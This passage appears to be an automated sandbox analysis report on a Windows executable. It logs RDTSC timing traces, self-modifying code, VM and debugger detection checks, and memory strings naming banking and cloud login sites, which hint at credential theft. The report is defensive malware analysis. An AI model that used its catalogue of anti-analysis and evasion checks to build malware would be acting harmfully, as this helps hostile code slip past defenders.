                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49707B9 second address: 4970026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ebx 0x00000006 popad 0x00000007 je 00007F59AAC7692Bh 0x0000000d xor eax, eax 0x0000000f jmp 00007F59385321CAh 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pop ebx 0x00000017 leave 0x00000018 retn 0004h 0x0000001b nop 0x0000001c xor ebx, ebx 0x0000001e cmp eax, 00000000h 0x00000021 je 00007F5938558BF3h 0x00000027 call 00007F593CA45F1Dh 0x0000002c mov edi, edi 0x0000002e jmp 00007F5938558A9Ah 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F5938558AA7h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970026 second address: 4970101 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F593855EEEFh 0x00000009 jmp 00007F593855EEF3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F593855EEF8h 0x00000015 or cl, FFFFFF88h 0x00000018 jmp 00007F593855EEEBh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 jmp 00007F593855EEF9h 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 jmp 00007F593855EEECh 0x0000002e mov esi, 7FBE7A71h 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 pushad 0x00000037 push esi 0x00000038 call 00007F593855EEF9h 0x0000003d pop eax 0x0000003e pop edi 0x0000003f pushfd 0x00000040 jmp 00007F593855EEEEh 0x00000045 jmp 00007F593855EEF5h 0x0000004a popfd 0x0000004b popad 0x0000004c xchg eax, ecx 0x0000004d jmp 00007F593855EEEEh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970101 second address: 4970105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970105 second address: 4970121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970121 second address: 4970127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970127 second address: 4970157 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F593855EEF8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970157 second address: 497015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 497015D second address: 497016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F593855EEEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970C9A second address: 4970CCD instructions: 0x00000000 rdtsc 0x00000002 mov si, 6DE7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 pushfd 0x00000011 jmp 00007F5938558AA0h 0x00000016 xor si, 8D48h 0x0000001b jmp 00007F5938558A9Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970CCD second address: 4970D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F593855EEF1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F593855EEEEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov cx, 12DDh 0x0000001c pushfd 0x0000001d jmp 00007F593855EEEAh 0x00000022 add ch, 00000038h 0x00000025 jmp 00007F593855EEEBh 0x0000002a popfd 0x0000002b popad 0x0000002c cmp dword ptr [770E459Ch], 05h 0x00000033 pushad 0x00000034 call 00007F593855EEF4h 0x00000039 pushad 0x0000003a popad 0x0000003b pop esi 0x0000003c call 00007F593855EEF1h 0x00000041 pushfd 0x00000042 jmp 00007F593855EEF0h 0x00000047 and al, FFFFFFF8h 0x0000004a jmp 00007F593855EEEBh 0x0000004f popfd 0x00000050 pop ecx 0x00000051 popad 0x00000052 je 00007F59AAC6CB66h 0x00000058 pushad 0x00000059 mov dl, 39h 0x0000005b push esi 0x0000005c push edi 0x0000005d pop esi 0x0000005e pop ebx 0x0000005f popad 0x00000060 pop ebp 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970D94 second address: 4970D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970D98 second address: 4970DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970DE8 second address: 4970DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970DEC second address: 4970DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970DF2 second address: 4970E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558A9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 2B69613Dh 0x0000000e pushad 0x0000000f jmp 00007F5938558AA7h 0x00000014 push eax 0x00000015 push edx 0x00000016 call 00007F5938558AA6h 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970E3A second address: 4970E57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 4BA43AEBh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970E57 second address: 4970E72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970E72 second address: 4970E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970E78 second address: 4970E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970E7C second address: 4970F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F59AAC73BCBh 0x00000010 push 77082B70h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov eax, dword ptr [esp+10h] 0x00000020 mov dword ptr [esp+10h], ebp 0x00000024 lea ebp, dword ptr [esp+10h] 0x00000028 sub esp, eax 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [770E4538h] 0x00000032 xor dword ptr [ebp-04h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 mov dword ptr [ebp-18h], esp 0x0000003b push dword ptr [ebp-08h] 0x0000003e mov eax, dword ptr [ebp-04h] 0x00000041 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000048 mov dword ptr [ebp-08h], eax 0x0000004b lea eax, dword ptr [ebp-10h] 0x0000004e mov dword ptr fs:[00000000h], eax 0x00000054 ret 0x00000055 pushad 0x00000056 mov esi, 534D1C7Bh 0x0000005b call 00007F593855EEF0h 0x00000060 call 00007F593855EEF2h 0x00000065 pop eax 0x00000066 pop edx 0x00000067 popad 0x00000068 sub esi, esi 0x0000006a pushad 0x0000006b movsx ebx, si 0x0000006e pushfd 0x0000006f jmp 00007F593855EEF6h 0x00000074 jmp 00007F593855EEF5h 0x00000079 popfd 0x0000007a popad 0x0000007b mov dword ptr [ebp-1Ch], esi 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F593855EEEDh 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970F39 second address: 4970F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970F3D second address: 4970F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970F43 second address: 4970F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4970F49 second address: 4970F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007F593855EEF4h 0x0000000f je 00007F59AAC62904h 0x00000015 jmp 00007F593855EEF0h 0x0000001a cmp dword ptr [ebp+08h], 00002000h 0x00000021 pushad 0x00000022 mov ecx, 5FD0426Dh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 49809F9 second address: 4980A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5938558AA7h 0x00000008 pushfd 0x00000009 jmp 00007F5938558AA8h 0x0000000e or cx, F4C8h 0x00000013 jmp 00007F5938558A9Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bx, 6336h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980A4A second address: 4980A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980A4F second address: 4980A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980A57 second address: 4980AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F593855EEEEh 0x0000000e mov ch, 97h 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, 6858FDA5h 0x0000001a pushfd 0x0000001b jmp 00007F593855EEF2h 0x00000020 jmp 00007F593855EEF5h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980AA4 second address: 4980AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980AA9 second address: 4980AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F593855EEF2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980AC8 second address: 4980ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5938558A9Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980ADA second address: 4980B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F593855EEECh 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F593855EEF0h 0x00000016 mov esi, dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980B0B second address: 4980B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980B0F second address: 4980B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980B13 second address: 4980B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980B19 second address: 4980B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F593855EEF2h 0x00000009 or ecx, 31578E38h 0x0000000f jmp 00007F593855EEEBh 0x00000014 popfd 0x00000015 mov eax, 121AFC6Fh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test esi, esi 0x0000001f jmp 00007F593855EEF2h 0x00000024 je 00007F59AAC5C740h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980B69 second address: 4980B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980B6D second address: 4980B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980B8A second address: 4980BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [770E459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5938558A9Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980BB5 second address: 4980C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F59AAC747B3h 0x0000000f jmp 00007F593855EEEEh 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 jmp 00007F593855EEEEh 0x0000001b call 00007F593855EEF2h 0x00000020 mov cx, 7471h 0x00000024 pop eax 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov ah, bh 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980C0F second address: 4980C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980C15 second address: 4980C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980CB0 second address: 4980CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980CB4 second address: 4980CBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980CBA second address: 4980CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4980CC0 second address: 4980CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSpecial instruction interceptor: First address: 4A7BAE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSpecial instruction interceptor: First address: 640FB0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSpecial instruction interceptor: First address: 6CFDE5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exe TID: 6944Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exe TID: 1624Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: NxqDwaYpbp.exe, 00000000.00000002.1500119918.0000000000622000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: NxqDwaYpbp.exe, NxqDwaYpbp.exe, 00000000.00000003.1497935897.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490071734.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447232506.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1448029796.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426522424.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501709999.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.0000000005450000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: NxqDwaYpbp.exe, 00000000.00000003.1497935897.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501430968.00000000009E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: NxqDwaYpbp.exe, 00000000.00000002.1500119918.0000000000622000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                Source: NxqDwaYpbp.exe, 00000000.00000003.1376174350.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: SICE
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeProcess queried: DebugPortJump to behavior
